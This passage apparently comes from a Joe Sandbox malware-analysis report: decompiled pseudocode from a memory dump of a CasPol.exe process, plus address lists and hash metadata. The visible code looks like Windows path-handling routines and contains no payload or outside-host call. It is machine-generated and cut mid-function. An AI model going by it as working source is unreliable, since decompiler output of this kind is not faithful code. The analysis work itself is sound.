														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M017445F8))) {
												case 0:
													_v568 = 0x1701078;
                                                                                                                                                                                                                                                                                                													__eax = 2;
                                                                                                                                                                                                                                                                                                													goto L20;
                                                                                                                                                                                                                                                                                                												case 1:
                                                                                                                                                                                                                                                                                                													goto L18;
                                                                                                                                                                                                                                                                                                												case 2:
                                                                                                                                                                                                                                                                                                													_t163 = 4;
                                                                                                                                                                                                                                                                                                													goto L19;
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										goto L41;
                                                                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                                                                										L18:
                                                                                                                                                                                                                                                                                                										_t163 = 0;
                                                                                                                                                                                                                                                                                                										L19:
                                                                                                                                                                                                                                                                                                										_v568 = 0x17011c4;
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									L20:
                                                                                                                                                                                                                                                                                                									_v588 = _t163;
                                                                                                                                                                                                                                                                                                									_v564 = _t163 + _t163;
                                                                                                                                                                                                                                                                                                									_t306 =  *_v568 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                									_v576 = _t265;
                                                                                                                                                                                                                                                                                                									if(_t265 > 0xfffe) {
                                                                                                                                                                                                                                                                                                										L90:
                                                                                                                                                                                                                                                                                                										_t322 = 0xc0000106;
                                                                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                                                                										if(_t321 != 0) {
                                                                                                                                                                                                                                                                                                											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                												if(_v580 != 0) {
                                                                                                                                                                                                                                                                                                													goto L23;
                                                                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                                                                													_t322 = 0xc0000106;
                                                                                                                                                                                                                                                                                                													goto L39;
                                                                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                                                                												_t177 = _t306;
                                                                                                                                                                                                                                                                                                												goto L25;
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                											goto L101;
                                                                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                                                                											if(_v580 == _t321) {
                                                                                                                                                                                                                                                                                                												_t322 = 0xc000000d;
                                                                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                                                                												L23:
                                                                                                                                                                                                                                                                                                												_t173 = L01744620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                                                                                                                                                                                                                                                                												_t269 = _v592;
                                                                                                                                                                                                                                                                                                												_t269[2] = _t173;
                                                                                                                                                                                                                                                                                                												if(_t173 == 0) {
                                                                                                                                                                                                                                                                                                													_t322 = 0xc0000017;
                                                                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                                                                													_t316 = _v556;
                                                                                                                                                                                                                                                                                                													 *_t269 = 0;
                                                                                                                                                                                                                                                                                                													_t321 = _t269;
                                                                                                                                                                                                                                                                                                													_t269[1] = _v576;
                                                                                                                                                                                                                                                                                                													_t177 =  *_v568 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                													L25:
                                                                                                                                                                                                                                                                                                													_v580 = _t177;
                                                                                                                                                                                                                                                                                                													if(_t177 == 0) {
                                                                                                                                                                                                                                                                                                														L29:
                                                                                                                                                                                                                                                                                                														_t307 =  *_t321 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                                                                														_t290 =  *_t321 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                														_v576 = _t290;
                                                                                                                                                                                                                                                                                                														_t310 = _t177 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                															_t307 =  *_t321 & 0xffff;
                                                                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                                                                															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                                                                                                                                                                                                                                                                															L0176F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                                                                                                                                                                                                                                                                															_t329 = _t329 + 0xc;
                                                                                                                                                                                                                                                                                                															_t311 = _v580;
                                                                                                                                                                                                                                                                                                															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                															 *_t321 = _t225;
                                                                                                                                                                                                                                                                                                															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                                                                															goto L29;
                                                                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													_t271 = _v556 - _v588 + _v588;
                                                                                                                                                                                                                                                                                                													_v580 = _t307;
                                                                                                                                                                                                                                                                                                													_v576 = _t271;
                                                                                                                                                                                                                                                                                                													if(_t271 != 0) {
                                                                                                                                                                                                                                                                                                														_t308 = _t271 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                														_v588 = _t308;
                                                                                                                                                                                                                                                                                                														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                                                                                                                                                                                                                                                                															L0176F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                                                                                                                                                                                                                                                                															_t329 = _t329 + 0xc;
                                                                                                                                                                                                                                                                                                															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                															 *_t321 = _t213;
                                                                                                                                                                                                                                                                                                															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													_t272 = _v560;
                                                                                                                                                                                                                                                                                                													if(_t272 != 0) {
                                                                                                                                                                                                                                                                                                														 *_t272 = _t321;
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													_t306 = 0;
                                                                                                                                                                                                                                                                                                													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                                                                                                                                                                                													_t275 = _v572;
                                                                                                                                                                                                                                                                                                													if(_t275 != 0) {
                                                                                                                                                                                                                                                                                                														_t306 =  *_t275;
                                                                                                                                                                                                                                                                                                														if(_t306 != 0) {
                                                                                                                                                                                                                                                                                                															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													_t181 = _v544;
                                                                                                                                                                                                                                                                                                													if(_t181 != 0) {
                                                                                                                                                                                                                                                                                                														 *_t181 = 0;
                                                                                                                                                                                                                                                                                                														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                                                                                                                                                                                                                                                                														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                                                                                                                                                                                                                                                                														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                                                                                                                                                                                                                                                                														if(_v540 == 5) {
                                                                                                                                                                                                                                                                                                															_t182 = E017252A5(1);
                                                                                                                                                                                                                                                                                                															_v588 = _t182;
                                                                                                                                                                                                                                                                                                															if(_t182 == 0) {
                                                                                                                                                                                                                                                                                                																E0173EB70(1, 0x18179a0);
                                                                                                                                                                                                                                                                                                																goto L38;
                                                                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                                                                																_v560 = _t182 + 0xc;
                                                                                                                                                                                                                                                                                                																_t185 = E0173AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                                                                                                                                                                                                                                                                																if(_t185 == 0) {
                                                                                                                                                                                                                                                                                                																	_t324 = _v588;
                                                                                                                                                                                                                                                                                                																	goto L97;
                                                                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                                                                																	_t306 = _v544;
                                                                                                                                                                                                                                                                                                																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                                                                                                                                                                                                                                                                																	 *(_t306 + 4) = _t282;
                                                                                                                                                                                                                                                                                                																	_v576 = _t282;
                                                                                                                                                                                                                                                                                                																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                																	 *_t306 = _t325;
                                                                                                                                                                                                                                                                                                																	if( *_t282 == 0x5c) {
                                                                                                                                                                                                                                                                                                																		_t149 = _t325 - 2; // -2
                                                                                                                                                                                                                                                                                                																		_t283 = _t149;
                                                                                                                                                                                                                                                                                                																		 *_t306 = _t283;
                                                                                                                                                                                                                                                                                                																		 *(_t306 + 4) = _v576 + 2;
                                                                                                                                                                                                                                                                                                																		_t185 = _t283 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                                                                																	_t324 = _v588;
                                                                                                                                                                                                                                                                                                																	 *(_t306 + 2) = _t185;
                                                                                                                                                                                                                                                                                                																	if((_v548 & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                                																		L97:
                                                                                                                                                                                                                                                                                                																		asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                                                                                																		if((_t185 | 0xffffffff) == 0) {
                                                                                                                                                                                                                                                                                                																			_push( *((intOrPtr*)(_t324 + 4)));
                                                                                                                                                                                                                                                                                                																			E017695D0();
                                                                                                                                                                                                                                                                                                																			L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                                                                																		 *(_t306 + 0xc) = _t324;
                                                                                                                                                                                                                                                                                                																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                                                                																	goto L38;
                                                                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                                                                															goto L41;
                                                                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													L38:
                                                                                                                                                                                                                                                                                                													_t322 = 0;
                                                                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									L39:
                                                                                                                                                                                                                                                                                                									if(_t254 !=  &_v532) {
                                                                                                                                                                                                                                                                                                										L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									_t169 = _t322;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								goto L41;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							goto L68;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					L41:
                                                                                                                                                                                                                                                                                                					_pop(_t317);
                                                                                                                                                                                                                                                                                                					_pop(_t323);
                                                                                                                                                                                                                                                                                                					_pop(_t255);
                                                                                                                                                                                                                                                                                                					return L0176B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t299 = __edx[2];
                                                                                                                                                                                                                                                                                                					if( *_t299 == 0x5c) {
                                                                                                                                                                                                                                                                                                						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                						if(_t256 != 0x5c) {
                                                                                                                                                                                                                                                                                                							if(_t256 != 0x3f) {
                                                                                                                                                                                                                                                                                                								goto L2;
                                                                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                                                                								goto L50;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                                                							L50:
                                                                                                                                                                                                                                                                                                							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                                                                                                                                                                                                                                                                								goto L2;
                                                                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                                                                								_t251 = E01763D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                                                                                                                                                                                                                                                                								_pop(_t319);
                                                                                                                                                                                                                                                                                                								_pop(_t326);
                                                                                                                                                                                                                                                                                                								_pop(_t257);
                                                                                                                                                                                                                                                                                                								return L0176B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						L2:
                                                                                                                                                                                                                                                                                                						_t260 = _v572;
                                                                                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				L101:
                                                                                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                                                                                0x01744582
                                                                                                                                                                                                                                                                                                0x0178e1ab
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01744588
                                                                                                                                                                                                                                                                                                0x01744588
                                                                                                                                                                                                                                                                                                0x0174458c
                                                                                                                                                                                                                                                                                                0x0178e1c4
                                                                                                                                                                                                                                                                                                0x0178e1c4
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01744592
                                                                                                                                                                                                                                                                                                0x01744592
                                                                                                                                                                                                                                                                                                0x01744599
                                                                                                                                                                                                                                                                                                0x0178e1be
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174459f
                                                                                                                                                                                                                                                                                                0x0174459f
                                                                                                                                                                                                                                                                                                0x017445a3
                                                                                                                                                                                                                                                                                                0x0178e1d7
                                                                                                                                                                                                                                                                                                0x0178e1e4
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017445a9
                                                                                                                                                                                                                                                                                                0x017445a9
                                                                                                                                                                                                                                                                                                0x017445b0
                                                                                                                                                                                                                                                                                                0x0178e1d1
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017445b6
                                                                                                                                                                                                                                                                                                0x017445b6
                                                                                                                                                                                                                                                                                                0x017445b6
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017445b6
                                                                                                                                                                                                                                                                                                0x017445b0
                                                                                                                                                                                                                                                                                                0x017445a3
                                                                                                                                                                                                                                                                                                0x01744599
                                                                                                                                                                                                                                                                                                0x0174458c
                                                                                                                                                                                                                                                                                                0x01744582
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017441f4
                                                                                                                                                                                                                                                                                                0x0174423e
                                                                                                                                                                                                                                                                                                0x01744241
                                                                                                                                                                                                                                                                                                0x017445c0
                                                                                                                                                                                                                                                                                                0x017445c4
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017445ca
                                                                                                                                                                                                                                                                                                0x017445ca
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178e207
                                                                                                                                                                                                                                                                                                0x0178e20f
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017445d1
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017445ca
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01744247
                                                                                                                                                                                                                                                                                                0x01744247
                                                                                                                                                                                                                                                                                                0x01744247
                                                                                                                                                                                                                                                                                                0x01744249
                                                                                                                                                                                                                                                                                                0x01744249
                                                                                                                                                                                                                                                                                                0x01744249
                                                                                                                                                                                                                                                                                                0x01744251
                                                                                                                                                                                                                                                                                                0x01744251
                                                                                                                                                                                                                                                                                                0x01744257
                                                                                                                                                                                                                                                                                                0x0174425f
                                                                                                                                                                                                                                                                                                0x0174426e
                                                                                                                                                                                                                                                                                                0x01744270
                                                                                                                                                                                                                                                                                                0x0174427a
                                                                                                                                                                                                                                                                                                0x0178e219
                                                                                                                                                                                                                                                                                                0x0178e219
                                                                                                                                                                                                                                                                                                0x01744280
                                                                                                                                                                                                                                                                                                0x01744282
                                                                                                                                                                                                                                                                                                0x01744456
                                                                                                                                                                                                                                                                                                0x017445ea
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017445f0
                                                                                                                                                                                                                                                                                                0x0178e223
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178e223
                                                                                                                                                                                                                                                                                                0x0174445c
                                                                                                                                                                                                                                                                                                0x0174445c
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017444f3
                                                                                                                                                                                                                                                                                                0x017443ff
                                                                                                                                                                                                                                                                                                0x01744405
                                                                                                                                                                                                                                                                                                0x01744405
                                                                                                                                                                                                                                                                                                0x01744405
                                                                                                                                                                                                                                                                                                0x017442ac
                                                                                                                                                                                                                                                                                                0x0174428c
                                                                                                                                                                                                                                                                                                0x01744282
                                                                                                                                                                                                                                                                                                0x01744407
                                                                                                                                                                                                                                                                                                0x0174440d
                                                                                                                                                                                                                                                                                                0x0178e2af
                                                                                                                                                                                                                                                                                                0x0178e2af
                                                                                                                                                                                                                                                                                                0x01744413
                                                                                                                                                                                                                                                                                                0x01744413
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017441d4
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017441c3
                                                                                                                                                                                                                                                                                                0x017441bd
                                                                                                                                                                                                                                                                                                0x01744415
                                                                                                                                                                                                                                                                                                0x01744415
                                                                                                                                                                                                                                                                                                0x01744416
                                                                                                                                                                                                                                                                                                0x01744417
                                                                                                                                                                                                                                                                                                0x01744429
                                                                                                                                                                                                                                                                                                0x0174416e
                                                                                                                                                                                                                                                                                                0x0174416e
                                                                                                                                                                                                                                                                                                0x01744175
                                                                                                                                                                                                                                                                                                0x01744498
                                                                                                                                                                                                                                                                                                0x0174449f
                                                                                                                                                                                                                                                                                                0x0178e12d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178e133
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178e133
                                                                                                                                                                                                                                                                                                0x017444a5
                                                                                                                                                                                                                                                                                                0x017444a5
                                                                                                                                                                                                                                                                                                0x017444aa
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017444bb
                                                                                                                                                                                                                                                                                                0x017444ca
                                                                                                                                                                                                                                                                                                0x017444d6
                                                                                                                                                                                                                                                                                                0x017444d7
                                                                                                                                                                                                                                                                                                0x017444d8
                                                                                                                                                                                                                                                                                                0x017444e3
                                                                                                                                                                                                                                                                                                0x017444e3
                                                                                                                                                                                                                                                                                                0x017444aa
                                                                                                                                                                                                                                                                                                0x0174417b
                                                                                                                                                                                                                                                                                                0x0174417b
                                                                                                                                                                                                                                                                                                0x0174417b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174417b
                                                                                                                                                                                                                                                                                                0x01744175
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ee4ec166f3dbe7e3be51b5c01c9c00c908fd83f8d036610aa35cfe5e09604c90
                                                                                                                                                                                                                                                                                                • Instruction ID: 6b408ba1e9faeb6925d0b8fa8b018498b0f0f5c461c853689eade5bcd2ef4999
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee4ec166f3dbe7e3be51b5c01c9c00c908fd83f8d036610aa35cfe5e09604c90
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5F179706082118BD724DF29C484B7AFBE1BF98714F14896EF986CB291EB34D981DB52
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 67%
                                                                                                                                                                                                                                                                                                			E0175513A(intOrPtr __ecx, void* __edx) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				signed char _v16;
                                                                                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                                                                                                                				signed int _v32;
                                                                                                                                                                                                                                                                                                				signed int _v36;
                                                                                                                                                                                                                                                                                                				signed int _v40;
                                                                                                                                                                                                                                                                                                				intOrPtr _v44;
                                                                                                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                                                                                                				char _v63;
                                                                                                                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                                                                                                                				signed int _v72;
                                                                                                                                                                                                                                                                                                				signed int _v76;
                                                                                                                                                                                                                                                                                                				signed int _v80;
                                                                                                                                                                                                                                                                                                				signed int _v84;
                                                                                                                                                                                                                                                                                                				signed int _v88;
                                                                                                                                                                                                                                                                                                				signed char* _v92;
                                                                                                                                                                                                                                                                                                				signed int _v100;
                                                                                                                                                                                                                                                                                                				signed int _v104;
                                                                                                                                                                                                                                                                                                				char _v105;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				void* _t157;
                                                                                                                                                                                                                                                                                                				signed int _t159;
                                                                                                                                                                                                                                                                                                				signed int _t160;
                                                                                                                                                                                                                                                                                                				unsigned int* _t161;
                                                                                                                                                                                                                                                                                                				intOrPtr _t165;
                                                                                                                                                                                                                                                                                                				signed int _t172;
                                                                                                                                                                                                                                                                                                				signed char* _t181;
                                                                                                                                                                                                                                                                                                				intOrPtr _t189;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t200;
                                                                                                                                                                                                                                                                                                				signed int _t202;
                                                                                                                                                                                                                                                                                                				signed int _t203;
                                                                                                                                                                                                                                                                                                				char _t204;
                                                                                                                                                                                                                                                                                                				signed int _t207;
                                                                                                                                                                                                                                                                                                				signed int _t208;
                                                                                                                                                                                                                                                                                                				void* _t209;
                                                                                                                                                                                                                                                                                                				intOrPtr _t210;
                                                                                                                                                                                                                                                                                                				signed int _t212;
                                                                                                                                                                                                                                                                                                				signed int _t214;
                                                                                                                                                                                                                                                                                                				signed int _t221;
                                                                                                                                                                                                                                                                                                				signed int _t222;
                                                                                                                                                                                                                                                                                                				signed int _t226;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t232;
                                                                                                                                                                                                                                                                                                				signed int _t233;
                                                                                                                                                                                                                                                                                                				signed int _t234;
                                                                                                                                                                                                                                                                                                				intOrPtr _t237;
                                                                                                                                                                                                                                                                                                				intOrPtr _t238;
                                                                                                                                                                                                                                                                                                				intOrPtr _t240;
                                                                                                                                                                                                                                                                                                				void* _t245;
                                                                                                                                                                                                                                                                                                				signed int _t246;
                                                                                                                                                                                                                                                                                                				signed int _t247;
                                                                                                                                                                                                                                                                                                				void* _t248;
                                                                                                                                                                                                                                                                                                				void* _t251;
                                                                                                                                                                                                                                                                                                				void* _t252;
                                                                                                                                                                                                                                                                                                				signed int _t253;
                                                                                                                                                                                                                                                                                                				signed int _t255;
                                                                                                                                                                                                                                                                                                				signed int _t256;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                                                                                                                                                                                                                                                                				_v8 =  *0x181d360 ^ _t255;
                                                                                                                                                                                                                                                                                                				_v32 = _v32 & 0x00000000;
                                                                                                                                                                                                                                                                                                				_t251 = __edx;
                                                                                                                                                                                                                                                                                                				_t237 = __ecx;
                                                                                                                                                                                                                                                                                                				_t212 = 6;
                                                                                                                                                                                                                                                                                                				_t245 =  &_v84;
                                                                                                                                                                                                                                                                                                				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                                                                                                                                                                                                                                                                				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                                                                                                                                                                                                                                                                				_v48 = __ecx;
                                                                                                                                                                                                                                                                                                				_v36 = _t207;
                                                                                                                                                                                                                                                                                                				_t157 = memset(_t245, 0, _t212 << 2);
                                                                                                                                                                                                                                                                                                				_t256 = _t255 + 0xc;
                                                                                                                                                                                                                                                                                                				_t246 = _t245 + _t212;
                                                                                                                                                                                                                                                                                                				if(_t207 == 2) {
                                                                                                                                                                                                                                                                                                					_t247 =  *(_t237 + 0x60);
                                                                                                                                                                                                                                                                                                					_t208 =  *(_t237 + 0x64);
                                                                                                                                                                                                                                                                                                					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                                                                                                                                                                                                                                                                					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                                                                                                                                                                                                                                                                					_v104 = _t159;
                                                                                                                                                                                                                                                                                                					_v76 = _t159;
                                                                                                                                                                                                                                                                                                					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                                                                                                                                                                                                                                                                					_v100 = _t160;
                                                                                                                                                                                                                                                                                                					_v72 = _t160;
                                                                                                                                                                                                                                                                                                					L19:
                                                                                                                                                                                                                                                                                                					_v80 = _t208;
                                                                                                                                                                                                                                                                                                					_v84 = _t247;
                                                                                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                                                                                					_t214 = 0;
                                                                                                                                                                                                                                                                                                					if( *(_t237 + 0x74) > 0) {
                                                                                                                                                                                                                                                                                                						_t82 = _t237 + 0x84; // 0x124
                                                                                                                                                                                                                                                                                                						_t161 = _t82;
                                                                                                                                                                                                                                                                                                						_v92 = _t161;
                                                                                                                                                                                                                                                                                                						while( *_t161 >> 0x1f != 0) {
                                                                                                                                                                                                                                                                                                							_t200 = _v92;
                                                                                                                                                                                                                                                                                                							if( *_t200 == 0x80000000) {
                                                                                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							_t214 = _t214 + 1;
                                                                                                                                                                                                                                                                                                							_t161 = _t200 + 0x10;
                                                                                                                                                                                                                                                                                                							_v92 = _t161;
                                                                                                                                                                                                                                                                                                							if(_t214 <  *(_t237 + 0x74)) {
                                                                                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						_v88 = _t214 << 4;
                                                                                                                                                                                                                                                                                                						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                                                                                                                                                                                                                                                                						_t165 = 0;
                                                                                                                                                                                                                                                                                                						asm("adc eax, [ecx+edx+0x7c]");
